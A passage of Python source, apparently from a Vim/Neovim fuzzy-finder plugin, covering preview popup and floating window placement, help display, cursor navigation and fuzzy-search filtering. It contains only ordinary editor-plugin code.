end = int(lfEval("line('.')")) - 1
col_width = float_window.width - int(lfEval("&numberwidth")) - 1
delta_height = lfActualLineCount(self._getInstance().buffer, start, end, col_width)
row = float_win_row + delta_height
col = float_win_col + int(lfEval("&numberwidth")) + 1 + float_window.cursor[1]
height = row
width = maxwidth
config = {
"relative": relative,
"anchor" : anchor,
"height" : height,
"width" : width,
"row" : row,
"col" : col
}
self._preview_winid = int(lfEval("nvim_open_win(%d, 0, %s)" % (buf_number, str(config))))
if jump_cmd:
cur_winid = lfEval("win_getid()")
lfCmd("noautocmd call win_gotoid(%d)" % self._preview_winid)
lfCmd(jump_cmd)
lfCmd("noautocmd call win_gotoid(%s)" % cur_winid)
if buffer_len >= line_nr > 0:
lfCmd("""call nvim_win_set_cursor(%d, [%d, 1])""" % (self._preview_winid, line_nr))
lfCmd("call nvim_win_set_option(%d, 'number', v:true)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'relativenumber', v:false)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'foldlevel', 1000)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'cursorline', v:true)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'colorcolumn', '')" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'winhighlight', 'Normal:Lf_hl_popup_window')" % self._preview_winid)
lfCmd("redraw!")
else:
popup_window = self._getInstance().window
popup_pos = lfEval("popup_getpos(%d)" % popup_window.id)
width = int(lfEval("get(g:, 'Lf_PreviewPopupWidth', 0)"))
if width == 0:
maxwidth = int(lfEval("&columns"))//2 - 1
else:
maxwidth = min(width, int(lfEval("&columns")))
preview_pos = lfEval("get(g:, 'Lf_PopupPreviewPosition', 'top')")
if preview_pos.lower() == 'bottom':
maxwidth = int(popup_pos["width"]) - 1 # there is one column of padding on the left
col = int(popup_pos["col"])
if self._getInstance().getPopupInstance().statusline_win:
statusline_height = 1
else:
statusline_height = 0
line = int(popup_pos["line"]) + int(popup_pos["height"]) + statusline_height
pos = "topleft"
maxheight = int(lfEval("&lines")) - line - 2
lfCmd("silent! call bufload(%d)" % buf_number)
buffer_len = len(vim.buffers[buf_number])
if buffer_len >= maxheight: # scrollbar appear
maxwidth -= 1
elif preview_pos.lower() == 'top':
maxwidth = int(popup_pos["width"]) - 1 # there is one column of padding on the left
col = int(popup_pos["col"])
# int(popup_pos["core_line"]) - 1(exclude the first line) - 1(input window) - 1(title)
maxheight = int(popup_pos["line"]) - 3
lfCmd("silent! call bufload(%d)" % buf_number)
buffer_len = len(vim.buffers[buf_number])
if buffer_len >= maxheight: # scrollbar appear
maxwidth -= 1
pos = "botleft"
line = maxheight + 1
else: # cursor
lfCmd("""call win_execute(%d, "let numberwidth = &numberwidth")""" % popup_window.id)
col = int(popup_pos["core_col"]) + int(lfEval("numberwidth")) + popup_window.cursor[1]
lfCmd("""call win_execute(%d, "let delta_height = line('.') - line('w0')")""" % popup_window.id)
# the line of buffer starts from 0, while the line of line() starts from 1
start = int(lfEval("line('w0', %d)" % popup_window.id)) - 1
end = int(lfEval("line('.', %d)" % popup_window.id)) - 1
col_width = int(popup_pos["core_width"]) - int(lfEval("numberwidth"))
delta_height = lfActualLineCount(self._getInstance().buffer, start, end, col_width)
# int(popup_pos["core_line"]) - 1(exclude the first line) - 1(input window)
maxheight = int(popup_pos["core_line"]) + delta_height - 2
pos = "botleft"
line = maxheight + 1
options = {
"title": title,
"maxwidth": maxwidth,
"minwidth": maxwidth,
"maxheight": maxheight,
"minheight": maxheight,
"zindex": 20481,
"pos": pos,
"line": line,
"col": col,
"padding": [0, 0, 0, 1],
"border": [1, 0, 0, 0],
"borderchars": [' '],
"borderhighlight": ["Lf_hl_previewTitle"],
"filter": "leaderf#popupModePreviewFilter",
}
if preview_pos.lower() == 'bottom':
del options["title"]
options["border"] = [0, 0, 1, 0]
elif preview_pos.lower() == 'cursor' and maxheight < int(lfEval("&lines"))//2 - 2:
maxheight = int(lfEval("&lines")) - maxheight - 5
del options["title"]
options["border"] = [0, 0, 1, 0]
options["maxheight"] = maxheight
options["minheight"] = maxheight
lfCmd("silent! let winid = popup_create(%d, %s)" % (buf_number, str(options)))
self._preview_winid = int(lfEval("winid"))
if jump_cmd:
lfCmd("""call win_execute(%d, '%s')""" % (self._preview_winid, escQuote(jump_cmd)))
elif line_nr > 0:
lfCmd("""call win_execute(%d, "exec 'norm! %dG'")""" % (self._preview_winid, line_nr))
lfCmd("call win_execute(%d, 'setlocal cursorline number norelativenumber colorcolumn= ')" % self._preview_winid)
lfCmd("call win_execute(%d, 'setlocal wincolor=Lf_hl_popup_window')" % self._preview_winid)
def _createPopupPreview(self, title, buf_number, line_nr, jump_cmd=''):
buf_number = int(buf_number)
line_nr = int(line_nr)
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._createPopupModePreview(title, buf_number, line_nr, jump_cmd)
return
if lfEval("has('nvim')") == '1':
width = int(lfEval("get(g:, 'Lf_PreviewPopupWidth', 0)"))
if width == 0:
width = int(lfEval("&columns"))//2
else:
width = min(width, int(lfEval("&columns")))
maxheight = int(lfEval("&lines - (line('w$') - line('.')) - 3"))
maxheight -= int(self._getInstance().window.height) - int(lfEval("(line('w$') - line('w0') + 1)"))
relative = 'editor'
anchor = "SW"
row = maxheight
lfCmd("silent! call bufload(%d)" % buf_number)
buffer_len = len(vim.buffers[buf_number])
height = min(maxheight, buffer_len)
preview_pos = lfEval("get(g:, 'Lf_PreviewHorizontalPosition', 'cursor')")
if preview_pos.lower() == 'center':
col = (int(lfEval("&columns")) - width) // 2
elif preview_pos.lower() == 'left':
col = 0
elif preview_pos.lower() == 'right':
col = int(lfEval("&columns")) - width
else:
relative = 'cursor'
row = 0
col = 0
if maxheight < int(lfEval("&lines"))//2 - 2:
anchor = "NW"
if relative == 'cursor':
row = 1
else:
row = maxheight + 1
height = min(int(lfEval("&lines")) - maxheight - 3, buffer_len)
config = {
"relative": relative,
"anchor" : anchor,
"height" : height,
"width" : width,
"row" : row,
"col" : col
}
self._preview_winid = int(lfEval("nvim_open_win(%d, 0, %s)" % (buf_number, str(config))))
if jump_cmd:
cur_winid = lfEval("win_getid()")
lfCmd("noautocmd call win_gotoid(%d)" % self._preview_winid)
lfCmd(jump_cmd)
lfCmd("noautocmd call win_gotoid(%s)" % cur_winid)
if buffer_len >= line_nr > 0:
lfCmd("""call nvim_win_set_cursor(%d, [%d, 1])""" % (self._preview_winid, line_nr))
lfCmd("call nvim_win_set_option(%d, 'number', v:true)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'relativenumber', v:false)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'foldlevel', 1000)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'cursorline', v:true)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'colorcolumn', '')" % self._preview_winid)
else:
preview_pos = lfEval("get(g:, 'Lf_PreviewHorizontalPosition', 'cursor')")
if preview_pos.lower() == 'center':
col = 0
elif preview_pos.lower() == 'left':
col = 1
elif preview_pos.lower() == 'right':
col = int(lfEval("&columns"))//2 + 2
else:
col = "cursor"
width = int(lfEval("get(g:, 'Lf_PreviewPopupWidth', 0)"))
if width == 0:
maxwidth = int(lfEval("&columns"))//2 - 1
else:
maxwidth = min(width, int(lfEval("&columns")))
maxheight = int(lfEval("&lines - (line('w$') - line('.')) - 4"))
maxheight -= int(self._getInstance().window.height) - int(lfEval("(line('w$') - line('w0') + 1)"))
if self._current_mode == 'NORMAL':
filter_cb = "leaderf#normalModePreviewFilter"
else:
filter_cb = "leaderf#popupModePreviewFilter"
options = {
"title": title,
"maxwidth": maxwidth,
"minwidth": maxwidth,
"maxheight": maxheight,
"minheight": maxheight,
"zindex": 20481,
"pos": "botleft",
"line": "cursor-1",
"col": col,
"padding": [0, 0, 0, 1],
"border": [1, 0, 0, 0],
"borderchars": [' '],
"borderhighlight": ["Lf_hl_previewTitle"],
"filter": filter_cb,
}
if maxheight < int(lfEval("&lines"))//2 - 2:
maxheight = int(lfEval("&lines")) - maxheight - 5
del options["title"]
options["border"] = [0, 0, 1, 0]
options["maxheight"] = maxheight
options["minheight"] = maxheight
lfCmd("silent! let winid = popup_create(%d, %s)" % (buf_number, str(options)))
self._preview_winid = int(lfEval("winid"))
if jump_cmd:
lfCmd("""call win_execute(%d, '%s')""" % (self._preview_winid, escQuote(jump_cmd)))
elif line_nr > 0:
lfCmd("""call win_execute(%d, "exec 'norm! %dG'")""" % (self._preview_winid, line_nr))
lfCmd("call win_execute(%d, 'setlocal cursorline number norelativenumber')" % self._preview_winid)
def _needPreview(self, preview):
"""
Args:
preview:
if True, always preview the result no matter what `g:Lf_PreviewResult` is.
"""
preview_dict = {k.lower(): v for k, v in lfEval("g:Lf_PreviewResult").items()}
category = self._getExplorer().getStlCategory()
if not preview and int(preview_dict.get(category.lower(), 0)) == 0:
return False
if self._getInstance().isReverseOrder():
if self._getInstance().window.cursor[0] > len(self._getInstance().buffer) - self._help_length:
return False
elif self._getInstance().window.cursor[0] <= self._help_length:
return False
if self._getInstance().empty() or (self._getInstance().getWinPos() != 'popup' and
vim.current.buffer != self._getInstance().buffer):
return False
if self._ctrlp_pressed == True:
return True
line = self._getInstance().currentLine
if self._orig_line == line and self._getInstance().buffer.options['modifiable']:
return False
self._orig_line = line
return True
def _getInstance(self):
if self._instance is None:
self._instance = LfInstance(self, self._getExplorer().getStlCategory(),
self._cli,
self._beforeEnter,
self._afterEnter,
self._beforeExit,
self._afterExit)
return self._instance
def _createHelpHint(self):
help = []
if not self._show_help:
if lfEval("get(g:, 'Lf_HideHelp', 0)") == '0':
help.append('" Press <F1> for help')
help.append('" ---------------------------------------------------------')
else:
help += self._createHelp()
self._help_length = len(help)
orig_row = self._getInstance().window.cursor[0]
if self._getInstance().isReverseOrder():
self._getInstance().buffer.options['modifiable'] = True
self._getInstance().buffer.append(help[::-1])
self._getInstance().buffer.options['modifiable'] = False
buffer_len = len(self._getInstance().buffer)
if buffer_len < self._initial_count:
if "--nowrap" not in self._arguments:
self._getInstance().window.height = min(self._initial_count,
self._getInstance()._actualLength(self._getInstance().buffer))
else:
self._getInstance().window.height = buffer_len
elif self._getInstance().window.height < self._initial_count:
self._getInstance().window.height = self._initial_count
lfCmd("normal! Gzb")
self._getInstance().window.cursor = (orig_row, 0)
else:
self._getInstance().buffer.options['modifiable'] = True
self._getInstance().buffer.append(help, 0)
self._getInstance().buffer.options['modifiable'] = False
self._getInstance().window.cursor = (orig_row + self._help_length, 0)
self._getInstance().refreshPopupStatusline()
def _hideHelp(self):
self._getInstance().buffer.options['modifiable'] = True
if self._getInstance().isReverseOrder():
orig_row = self._getInstance().window.cursor[0]
countdown = len(self._getInstance().buffer) - orig_row - self._help_length
if self._help_length > 0:
del self._getInstance().buffer[-self._help_length:]
self._getInstance().buffer[:] = self._getInstance().buffer[-self._initial_count:]
lfCmd("normal! Gzb")
if 0 < countdown < self._initial_count:
self._getInstance().window.cursor = (len(self._getInstance().buffer) - countdown, 0)
else:
self._getInstance().window.cursor = (len(self._getInstance().buffer), 0)
self._getInstance().setLineNumber()
else:
del self._getInstance().buffer[:self._help_length]
if self._help_length > 0 and self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'norm! %dk')" % (self._getInstance().getPopupWinId(), self._help_length))
self._help_length = 0
self._getInstance().refreshPopupStatusline()
def _getExplorer(self):
if self._explorer is None:
self._explorer = self._getExplClass()()
return self._explorer
def _resetAutochdir(self):
if int(lfEval("&autochdir")) == 1:
self._autochdir = 1
lfCmd("set noautochdir")
else:
self._autochdir = 0
def _setAutochdir(self):
if self._autochdir == 1:
# When autochdir is set, Vim will change the current working directory
# to the directory containing the file which was opened or selected.
lfCmd("set autochdir")
def _toUpInPopup(self):
if self._preview_winid > 0 and int(lfEval("winbufnr(%d)" % self._preview_winid)) != -1:
if lfEval("has('nvim')") == '1':
cur_winid = lfEval("win_getid()")
lfCmd("noautocmd call win_gotoid(%d)" % self._preview_winid)
lfCmd("norm! k")
lfCmd("redraw")
lfCmd("noautocmd call win_gotoid(%s)" % cur_winid)
else:
lfCmd("call win_execute(%d, 'norm! k')" % (self._preview_winid))
def _toDownInPopup(self):
if self._preview_winid > 0 and int(lfEval("winbufnr(%d)" % self._preview_winid)) != -1:
if lfEval("has('nvim')") == '1':
cur_winid = lfEval("win_getid()")
lfCmd("noautocmd call win_gotoid(%d)" % self._preview_winid)
lfCmd("norm! j")
lfCmd("redraw")
lfCmd("noautocmd call win_gotoid(%s)" % cur_winid)
else:
lfCmd("call win_execute(%d, 'norm! j')" % (self._preview_winid))
def _toUp(self):
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'norm! k')" % (self._getInstance().getPopupWinId()))
self._getInstance().refreshPopupStatusline()
return
adjust = False
if self._getInstance().isReverseOrder() and self._getInstance().getCurrentPos()[0] == 1:
adjust = True
self._setResultContent()
if self._cli.pattern and self._cli.isFuzzy \
and len(self._highlight_pos) < (len(self._getInstance().buffer) - self._help_length) // self._getUnit() \
and len(self._highlight_pos) < int(lfEval("g:Lf_NumberOfHighlight")):
self._highlight_method()
lfCmd("norm! k")
if adjust:
lfCmd("norm! zt")
self._getInstance().setLineNumber()
lfCmd("setlocal cursorline!") # these two help to redraw the statusline,
lfCmd("setlocal cursorline!") # also fix a weird bug of vim
def _toDown(self):
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'norm! j')" % (self._getInstance().getPopupWinId()))
self._getInstance().refreshPopupStatusline()
return
if not self._getInstance().isReverseOrder() \
and self._getInstance().getCurrentPos()[0] == self._getInstance().window.height:
self._setResultContent()
lfCmd("norm! j")
self._getInstance().setLineNumber()
lfCmd("setlocal cursorline!") # these two help to redraw the statusline,
lfCmd("setlocal cursorline!") # also fix a weird bug of vim
def _pageUp(self):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, 'exec "norm! \<PageUp>"')""" % (self._getInstance().getPopupWinId()))
self._getInstance().refreshPopupStatusline()
return
if self._getInstance().isReverseOrder():
self._setResultContent()
if self._cli.pattern and self._cli.isFuzzy \
and len(self._highlight_pos) < (len(self._getInstance().buffer) - self._help_length) // self._getUnit() \
and len(self._highlight_pos) < int(lfEval("g:Lf_NumberOfHighlight")):
self._highlight_method()
lfCmd('exec "norm! \<PageUp>"')
self._getInstance().setLineNumber()
def _pageDown(self):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, 'exec "norm! \<PageDown>"')""" % (self._getInstance().getPopupWinId()))
self._getInstance().refreshPopupStatusline()
return
if not self._getInstance().isReverseOrder():
self._setResultContent()
lfCmd('exec "norm! \<PageDown>"')
self._getInstance().setLineNumber()
def _leftClick(self):
if self._getInstance().getWinPos() == 'popup':
if int(lfEval("has('patch-8.1.2266')")) == 1:
if self._getInstance().getPopupWinId() == int(lfEval("v:mouse_winid")):
lfCmd("""call win_execute(%d, "exec v:mouse_lnum")""" % (self._getInstance().getPopupWinId()))
lfCmd("""call win_execute(%d, "exec 'norm!'.v:mouse_col.'|'")""" % (self._getInstance().getPopupWinId()))
exit_loop = False
elif self._getInstance().window.number == int(lfEval("v:mouse_win")):
lfCmd("exec v:mouse_lnum")
lfCmd("exec 'norm!'.v:mouse_col.'|'")
self._getInstance().setLineNumber()
self.clearSelections()
exit_loop = False
elif self._preview_winid == int(lfEval("v:mouse_winid")):
if lfEval("has('nvim')") == '1':
lfCmd("call win_gotoid(%d)" % self._preview_winid)
lfCmd("exec v:mouse_lnum")
lfCmd("exec 'norm!'.v:mouse_col.'|'")
self._current_mode = 'NORMAL'
lfCmd("call leaderf#colorscheme#popup#hiMode('%s', '%s')" % (self._getExplorer().getStlCategory(), self._current_mode))
self._getInstance().setPopupStl(self._current_mode)
exit_loop = True
else:
self.quit()
exit_loop = True
return exit_loop
def _search(self, content, is_continue=False, step=0):
if not is_continue:
self.clearSelections()
self._clearHighlights()
self._clearHighlightsPos()
self._cli.highlightMatches()
if not self._cli.pattern: # e.g., when <BS> or <Del> is typed
if self._empty_query and self._getExplorer().getStlCategory() in ["File"]:
self._guessSearch(self._content)
else:
self._getInstance().setBuffer(content[:self._initial_count])
self._getInstance().setStlResultsCount(len(content), True)
self._result_content = []
return
if self._cli.isFuzzy:
self._fuzzySearch(content, is_continue, step)
else:
self._regexSearch(content, is_continue, step)
if self._getExplorer().getStlCategory() not in ["File"]:
self._previewResult(False)
def _filter(self, step, filter_method, content, is_continue,
use_fuzzy_engine=False, return_index=False):
""" Construct a list from result of filter_method(content).
Args:
step: An integer to indicate the number of lines to filter one time.
filter_method: A function to apply `content` as parameter and
return an iterable.
content: The list to be filtered.
"""
unit = self._getUnit()
step = step // unit * unit
length = len(content)
if self._index == 0:
self._cb_content = []
self._result_content = []
self._index = min(step, length)
cur_content = content[:self._index]
else:
if not is_continue and self._result_content:
if self._cb_content:
self._cb_content += self._result_content
else:
self._cb_content = self._result_content
if len(self._cb_content) >= step:
cur_content = self._cb_content[:step]
self._cb_content = self._cb_content[step:]
else:
cur_content = self._cb_content
left = step - len(self._cb_content)
self._cb_content = []
if self._index < length:
end = min(self._index + left, length)
cur_content += content[self._index:end]
self._index = end
if self._cli.isAndMode:
result, highlight_methods = filter_method(cur_content)
if is_continue:
self._previous_result = (self._previous_result[0] + result[0],
self._previous_result[1] + result[1])
result = self._previous_result
else:
self._previous_result = result
return (result, highlight_methods)
elif use_fuzzy_engine:
if return_index:
mode = 0 if self._cli.isFullPath else 1
tmp_content = [self._getDigest(line, mode) for line in cur_content]
result = filter_method(source=tmp_content)
result = (result[0], [cur_content[i] for i in result[1]])
else:
result = filter_method(source=cur_content)
if is_continue:
result = fuzzyEngine.merge(self._previous_result, result)
self._previous_result = result
else:
result = list(filter_method(cur_content))
if is_continue:
self._previous_result += result
result = self._previous_result
else:
self._previous_result = result
return result
def _fuzzyFilter(self, is_full_path, get_weight, iterable):
"""
return a list, each item is a pair (weight, line)
"""
getDigest = partial(self._getDigest, mode=0 if is_full_path else 1)
pairs = ((get_weight(getDigest(line)), line) for line in iterable)
MIN_WEIGHT = fuzzyMatchC.MIN_WEIGHT if is_fuzzyMatch_C else FuzzyMatch.MIN_WEIGHT
return (p for p in pairs if p[0] > MIN_WEIGHT)
def _fuzzyFilterEx(self, is_full_path, get_weight, iterable):
"""
return a tuple, (weights, indices)
"""
getDigest = partial(self._getDigest, mode=0 if is_full_path else 1)
if self._getUnit() > 1: # currently, only BufTag's _getUnit() is 2
iterable = itertools.islice(iterable, 0, None, self._getUnit())
pairs = ((get_weight(getDigest(line)), i) for i, line in enumerate(iterable))
MIN_WEIGHT = fuzzyMatchC.MIN_WEIGHT if is_fuzzyMatch_C else FuzzyMatch.MIN_WEIGHT
result = [p for p in pairs if p[0] > MIN_WEIGHT]
if len(result) == 0:
weights, indices = [], []
else:
weights, indices = zip(*result)
return (list(weights), list(indices))
def _refineFilter(self, first_get_weight, get_weight, iterable):
getDigest = self._getDigest
triples = ((first_get_weight(getDigest(line, 1)),
get_weight(getDigest(line, 2)), line)
for line in iterable)
MIN_WEIGHT = fuzzyMatchC.MIN_WEIGHT if is_fuzzyMatch_C else FuzzyMatch.MIN_WEIGHT
return ((i[0] + i[1], i[2]) for i in triples if i[0] > MIN_WEIGHT and i[1] > MIN_WEIGHT)
def _andModeFilter(self, iterable):
encoding = lfEval("&encoding")
use_fuzzy_engine = False
cur_content = iterable
weight_lists = []
highlight_methods = []
for p in self._cli.pattern:
if self._fuzzy_engine and isAscii(p) and self._getUnit() == 1: # currently, only BufTag's _getUnit() is 2
use_fuzzy_engine = True
pattern = fuzzyEngine.initPattern(p)
if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath:
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=False, sort_results=False)
elif self._getExplorer().getStlCategory() in ["Self", "Buffer", "Mru", "BufTag",
"Function", "History", "Cmd_History", "Search_History", "Tag", "Rg", "Filetype",
"Command"]:
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=True, sort_results=False)
else:
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=not self._cli.isFullPath, sort_results=False)
getHighlights = partial(fuzzyEngine.getHighlights, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=not self._cli.isFullPath)
highlight_method = partial(self._highlight, self._cli.isFullPath, getHighlights, True, clear=False)
elif is_fuzzyMatch_C and isAscii(p):
pattern = fuzzyMatchC.initPattern(p)
if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath:
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=False)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=False)
else:
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=True)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=True)
filter_method = partial(self._fuzzyFilterEx, self._cli.isFullPath, getWeight)
highlight_method = partial(self._highlight, self._cli.isFullPath, getHighlights, clear=False)
else:
fuzzy_match = FuzzyMatch(p, encoding)
if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath:
filter_method = partial(self._fuzzyFilterEx,
self._cli.isFullPath,
fuzzy_match.getWeight2)
elif self._getExplorer().getStlCategory() in ["Self", "Buffer", "Mru", "BufTag",
"Function", "History", "Cmd_History", "Search_History", "Tag", "Rg", "Filetype",
"Command"]:
filter_method = partial(self._fuzzyFilterEx,
self._cli.isFullPath,
fuzzy_match.getWeight3)
else:
filter_method = partial(self._fuzzyFilterEx,
self._cli.isFullPath,
fuzzy_match.getWeight)
highlight_method = partial(self._highlight,
self._cli.isFullPath,
fuzzy_match.getHighlights,
clear=False)
if use_fuzzy_engine:
mode = 0 if self._cli.isFullPath else 1
tmp_content = [self._getDigest(line, mode) for line in cur_content]
result = filter_method(source=tmp_content)
else:
result = filter_method(cur_content)
for i, wl in enumerate(weight_lists):
weight_lists[i] = [wl[j] for j in result[1]]
weight_lists.append(result[0])
if self._getUnit() > 1: # currently, only BufTag's _getUnit() is 2
unit = self._getUnit()
result_content = [cur_content[i*unit:i*unit + unit] for i in result[1]]
cur_content = list(itertools.chain.from_iterable(result_content))
else:
cur_content = [cur_content[i] for i in result[1]]
result_content = cur_content
highlight_methods.append(highlight_method)
weights = [sum(i) for i in zip(*weight_lists)]
return ((weights, result_content), highlight_methods)
def _fuzzySearch(self, content, is_continue, step):
encoding = lfEval("&encoding")
use_fuzzy_engine = False
use_fuzzy_match_c = False
if self._cli.isAndMode:
filter_method = self._andModeFilter
elif self._cli.isRefinement:
if self._cli.pattern[1] == '': # e.g. abc;
if self._fuzzy_engine and isAscii(self._cli.pattern[0]):
use_fuzzy_engine = True
return_index = True
pattern = fuzzyEngine.initPattern(self._cli.pattern[0])
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=True, sort_results=True)
getHighlights = partial(fuzzyEngine.getHighlights, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=True)
highlight_method = partial(self._highlight, True, getHighlights, True)
elif is_fuzzyMatch_C and isAscii(self._cli.pattern[0]):
use_fuzzy_match_c = True
pattern = fuzzyMatchC.initPattern(self._cli.pattern[0])
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=True)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=True)
filter_method = partial(self._fuzzyFilter, False, getWeight)
highlight_method = partial(self._highlight, False, getHighlights)
else:
fuzzy_match = FuzzyMatch(self._cli.pattern[0], encoding)
getWeight = fuzzy_match.getWeight
getHighlights = fuzzy_match.getHighlights
filter_method = partial(self._fuzzyFilter, False, getWeight)
highlight_method = partial(self._highlight, False, getHighlights)
elif self._cli.pattern[0] == '': # e.g. ;abc
if self._fuzzy_engine and isAscii(self._cli.pattern[1]):
use_fuzzy_engine = True
return_index = True
pattern = fuzzyEngine.initPattern(self._cli.pattern[1])
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=False, sort_results=True)
getHighlights = partial(fuzzyEngine.getHighlights, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=False)
highlight_method = partial(self._highlight, True, getHighlights, True)
elif is_fuzzyMatch_C and isAscii(self._cli.pattern[1]):
use_fuzzy_match_c = True
pattern = fuzzyMatchC.initPattern(self._cli.pattern[1])
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=False)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=False)
filter_method = partial(self._fuzzyFilter, True, getWeight)
highlight_method = partial(self._highlight, True, getHighlights)
else:
fuzzy_match = FuzzyMatch(self._cli.pattern[1], encoding)
getWeight = fuzzy_match.getWeight
getHighlights = fuzzy_match.getHighlights
filter_method = partial(self._fuzzyFilter, True, getWeight)
highlight_method = partial(self._highlight, True, getHighlights)
else: # e.g. abc;def
if is_fuzzyMatch_C and isAscii(self._cli.pattern[0]):
is_ascii_0 = True
pattern_0 = fuzzyMatchC.initPattern(self._cli.pattern[0])
getWeight_0 = partial(fuzzyMatchC.getWeight, pattern=pattern_0, is_name_only=True)
getHighlights_0 = partial(fuzzyMatchC.getHighlights, pattern=pattern_0, is_name_only=True)
else:
is_ascii_0 = False
fuzzy_match_0 = FuzzyMatch(self._cli.pattern[0], encoding)
getWeight_0 = fuzzy_match_0.getWeight
getHighlights_0 = fuzzy_match_0.getHighlights
if is_fuzzyMatch_C and isAscii(self._cli.pattern[1]):
is_ascii_1 = True
pattern_1 = fuzzyMatchC.initPattern(self._cli.pattern[1])
getWeight_1 = partial(fuzzyMatchC.getWeight, pattern=pattern_1, is_name_only=False)
getHighlights_1 = partial(fuzzyMatchC.getHighlights, pattern=pattern_1, is_name_only=False)
else:
is_ascii_1 = False
fuzzy_match_1 = FuzzyMatch(self._cli.pattern[1], encoding)
getWeight_1 = fuzzy_match_1.getWeight
getHighlights_1 = fuzzy_match_1.getHighlights
use_fuzzy_match_c = is_ascii_0 and is_ascii_1
filter_method = partial(self._refineFilter, getWeight_0, getWeight_1)
highlight_method = partial(self._highlightRefine, getHighlights_0, getHighlights_1)
else:
if self._fuzzy_engine and isAscii(self._cli.pattern) and self._getUnit() == 1: # currently, only BufTag's _getUnit() is 2
use_fuzzy_engine = True
pattern = fuzzyEngine.initPattern(self._cli.pattern)
if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath:
return_index = False
filter_method = partial(fuzzyEngine.fuzzyMatch, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=False, sort_results=True)
elif self._getExplorer().getStlCategory() in ["Rg"]:
if "--match-path" in self._arguments:
return_index = False
filter_method = partial(fuzzyEngine.fuzzyMatch, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=True, sort_results=True)
else:
return_index = True
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=True, sort_results=True)
elif self._getExplorer().getStlCategory() in ["Self", "Buffer", "Mru", "BufTag",
"Function", "History", "Cmd_History", "Search_History", "Tag", "Filetype",
"Command"]:
return_index = True
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=True, sort_results=True)
else:
return_index = True
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=not self._cli.isFullPath, sort_results=True)
getHighlights = partial(fuzzyEngine.getHighlights, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=not self._cli.isFullPath)
highlight_method = partial(self._highlight, self._cli.isFullPath, getHighlights, True)
elif is_fuzzyMatch_C and isAscii(self._cli.pattern):
use_fuzzy_match_c = True
pattern = fuzzyMatchC.initPattern(self._cli.pattern)
if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath:
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=False)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=False)
else:
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=True)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=True)
filter_method = partial(self._fuzzyFilter, self._cli.isFullPath, getWeight)
highlight_method = partial(self._highlight, self._cli.isFullPath, getHighlights)
else:
fuzzy_match = FuzzyMatch(self._cli.pattern, encoding)
if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath:
filter_method = partial(self._fuzzyFilter,
self._cli.isFullPath,
fuzzy_match.getWeight2)
elif self._getExplorer().getStlCategory() in ["Self", "Buffer", "Mru", "BufTag",
"Function", "History", "Cmd_History", "Search_History", "Rg", "Filetype",
"Command"]:
filter_method = partial(self._fuzzyFilter,
self._cli.isFullPath,
fuzzy_match.getWeight3)
else:
filter_method = partial(self._fuzzyFilter,
self._cli.isFullPath,
fuzzy_match.getWeight)
highlight_method = partial(self._highlight,
self._cli.isFullPath,
fuzzy_match.getHighlights)
if self._cli.isAndMode:
if self._fuzzy_engine and isAscii(''.join(self._cli.pattern)):
step = 20000 * cpu_count
else:
step = 10000
pair, highlight_methods = self._filter(step, filter_method, content, is_continue)
pairs = sorted(zip(*pair), key=operator.itemgetter(0), reverse=True)
self._result_content = self._getList(pairs)
elif use_fuzzy_engine:
if step == 0:
if return_index == True:
step = 20000 * cpu_count
else:
step = 40000 * cpu_count
_, self._result_content = self._filter(step, filter_method, content, is_continue, True, return_index)
else:
if step == 0:
if use_fuzzy_match_c:
step = 40000
